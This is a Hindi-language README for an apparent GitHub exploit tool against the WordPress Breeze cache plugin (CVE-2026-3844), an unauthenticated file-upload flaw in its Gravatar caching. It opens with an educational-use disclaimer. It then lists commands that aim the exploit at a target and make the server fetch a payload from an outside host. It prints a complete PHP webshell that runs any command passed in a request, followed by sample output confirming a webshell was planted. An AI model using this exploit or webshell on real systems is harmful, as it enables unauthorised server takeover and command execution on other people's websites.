
वर्डप्रेस - ब्रीज़ कैश <= 2.4.4 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
यह टूल केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस टूल का उपयोग केवल उन
सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए लेखक कोई ज़िम्मेदारी नहीं लेता है।
CVE-2026-3844 WordPress के लिए प्लगइन (संस्करण ≤ 2.4.4) में एक गंभीर बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड भेद्यता है। प्लगइन टिप्पणियों में पैरामीटर को ठीक से मान्य नहीं करता है, जिससे दूरस्थ हमलावर सर्वर पर दुर्भावनापूर्ण फ़ाइलें (वेबशेल सहित) अपलोड कर सकते हैं।
srcsetयह भेद्यता Breeze में Gravatar कैशिंग कार्यक्षमता का शोषण करती है। जब एक विशेष रूप से तैयार किए गए srcset पैरामीटर के साथ एक टिप्पणी पोस्ट की जाती है जिसमें एक दूरस्थ फ़ाइल URL होता है, तो Breeze फ़ाइल को डाउनलोड करके स्थानीय रूप से यहाँ संग्रहीत करता है:
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]
पूर्वापेक्षा: Breeze सेटिंग्स में "Host Files Locally - Gravatars" विकल्प सक्षम होना चाहिए।
# रिपॉजिटरी क्लोन करें
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844
# निर्भरताएँ स्थापित करें
pip install pycurl termcolor
python3 CVE-2026-3844.py -u http://target.com
# शोषण के बिना जाँचें कि लक्ष्य असुरक्षित है या नहीं
python3 CVE-2026-3844.py -u http://target.com --check-only
# कस्टम पेलोड URL का उपयोग करें
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php
# आउटपुट को फ़ाइल में सहेजें
python3 CVE-2026-3844.py -u http://target.com -o shells.txt
# धीमे लक्ष्यों के लिए टाइमआउट बढ़ाएँ
python3 CVE-2026-3844.py -u http://target.com --timeout 30
| तर्क | विवरण |
|---|---|
-u, --url | लक्ष्य URL (आवश्यक) |
-p, --payload | दूरस्थ पेलोड URL |
--timeout | सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 15) |
--check-only | केवल जाँचें कि लक्ष्य असुरक्षित है या नहीं |
-o, --output | शेल URL को फ़ाइल में सहेजें |
अपना स्वयं का वेबशेल बनाएँ (shell.php):
<?php
if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
}
?>
इसे कहीं सुलभ स्थान पर होस्ट करें, फिर उपयोग करें:
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php
एक्सप्लॉइट स्वचालित रूप से अपलोड की गई फ़ाइल में सत्यापन स्ट्रिंग 4356452d323032362d33383434 (हेक्स एन्कोडेड "CVE-2026-3844") की जाँच करता है ताकि सफल शोषण की पुष्टि हो सके।
[*] PHASE 1: VULNERABILITY ASSESSMENT
[*] Checking Breeze plugin version...
[+] Target VULNERABLE (Breeze v2.4.4)
[*] PHASE 2: EXPLOITATION
[!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED
[*] Step 1: Sending malicious comment...
[+] Comment posted successfully
[*] Step 2: Waiting for Breeze to cache the file...
[*] Step 3: Checking for uploaded file...
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
[✓] STATUS: SUCCESS
[✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
CVE-2026-3844/
├── CVE-2026-3844.py # मुख्य शोषण स्क्रिप्ट
├── README.md # यह फ़ाइल
└── LICENSE # MIT लाइसेंस
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार ⭐ दें!